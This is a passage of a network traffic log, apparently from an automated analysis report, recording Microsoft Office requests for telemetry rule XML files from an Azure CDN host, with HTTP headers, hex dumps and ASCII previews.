                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:51 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:51 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1358
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                  ETag: "0x8DC582BE6431446"
                                                  x-ms-request-id: 5c8c4e1d-601e-0002-3bca-2aa786000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195051Z-159b85dff8f6x4jjhC1DFW7uqg00000001s00000000038hv
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:51 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  101192.168.2.45241413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:51 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:51 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:51 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1389
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                  ETag: "0x8DC582BE10A6BC1"
                                                  x-ms-request-id: cdbfd92d-501e-0029-317f-27d0b8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195051Z-15b8d89586fzcfbd8we4bvhqds00000004x000000000bbm0
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:51 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  102192.168.2.45241513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:51 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:51 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:51 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1352
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                  ETag: "0x8DC582BE9DEEE28"
                                                  x-ms-request-id: 258e3987-401e-0047-4dfa-288597000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195051Z-17c5cb586f672xmrz843mf85fn00000008zg0000000094mv
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:51 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  103192.168.2.45241613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:51 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:51 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:51 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1405
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                  ETag: "0x8DC582BE12B5C71"
                                                  x-ms-request-id: 2e8006eb-901e-0083-471c-26bb55000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195051Z-16849878b78j5kdg3dndgqw0vg0000000bt000000000376y
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:51 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  104192.168.2.45241713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:51 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:51 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:51 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1368
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                  ETag: "0x8DC582BDDC22447"
                                                  x-ms-request-id: 51d3ccdb-001e-0017-566a-2b0c3c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195051Z-15b8d89586fhl2qtatrz3vfkf00000000gb000000000drmr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:51 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  105192.168.2.45241813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:52 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:52 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:52 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1401
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                  ETag: "0x8DC582BE055B528"
                                                  x-ms-request-id: 04bfc9b2-001e-0017-54ad-260c3c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195052Z-16849878b78nzcqcd7bed2fb6n00000002e000000000dhgk
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:52 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  106192.168.2.45241913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:52 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:52 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:52 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1364
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                  ETag: "0x8DC582BE1223606"
                                                  x-ms-request-id: 8cda5ddf-101e-0046-65bc-2a91b0000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195052Z-159b85dff8fprglthC1DFW8zcg0000000200000000003m4g
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:52 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  107192.168.2.45242113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:52 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:52 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:52 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1360
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                  ETag: "0x8DC582BDDEB5124"
                                                  x-ms-request-id: e478d41d-d01e-005a-6d85-2a7fd9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195052Z-17c5cb586f6f8m6jcqp9ufve6n00000000hg00000000ha3p
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:52 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  108192.168.2.45242013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:52 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:52 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:52 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1397
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                  ETag: "0x8DC582BE7262739"
                                                  x-ms-request-id: f0c9e92d-201e-0000-1199-25a537000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195052Z-16849878b78bjkl8dpep89pbgg00000008k000000000zqmp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:52 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  109192.168.2.45242213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:52 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:52 UTC538INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:52 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1403
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                  ETag: "0x8DC582BDCB4853F"
                                                  x-ms-request-id: 7be90567-f01e-00aa-3367-2a8521000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195052Z-159b85dff8fx9jp8hC1DFWp25400000001x000000000c803
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:52 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  110192.168.2.45242313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:52 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:53 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:53 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1366
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                  ETag: "0x8DC582BDB779FC3"
                                                  x-ms-request-id: 66721f0b-e01e-00aa-4086-29ceda000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195053Z-17c5cb586f67hfgj2durhqcxk800000008y000000000c24x
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
